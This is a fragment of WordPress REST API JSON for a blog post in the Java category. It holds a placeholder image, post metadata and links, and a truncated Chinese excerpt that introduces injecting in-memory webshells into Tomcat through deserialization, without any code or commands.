src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-32\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>\u5728\u5229\u7528\u53cd\u5e8f\u5217\u5316\u6ce8\u5165\u5185\u5b58\u9a6c\u7684\u5b9e\u6218\u4e2d\uff0c\u901a\u5e38\u9047\u5230\u73af\u5883\u90fd\u662f\u5efa\u7acb\u5728\u4ee5Tomcat\u4e3a\u5bb9\u5668\u7684\u73af\u5883\u4e2d\u7684\u3002 \u800cTomcat\u5177\u6709\u4e00 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-30","post","type-post","status-publish","format-standard","hentry","category-java"],"_links":{"self":[{"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/posts\/30","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/comments?post=30"}],"version-history":[{"count":2,"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/posts\/30\/revisions"}],"predecessor-version":[{"id":33,"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/posts\/30\/revisions\/33"}],"wp:attachment":[{"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/media?parent=30"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/categories?post=30"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/byname6.cn\/index.php\/wp-json\/wp\/v2\/tags?post=30"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}